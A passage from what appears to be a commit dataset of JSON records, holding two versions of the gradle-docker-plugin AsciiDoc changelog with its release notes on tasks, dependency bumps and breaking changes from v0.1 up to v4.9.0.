docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0f1b4c310ce92cadf04caf2bed3755ae7870561","subject":"Update 50-changes.adoc","message":"Update 50-changes.adoc","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v4.9.0 (TBA)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not inject into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - 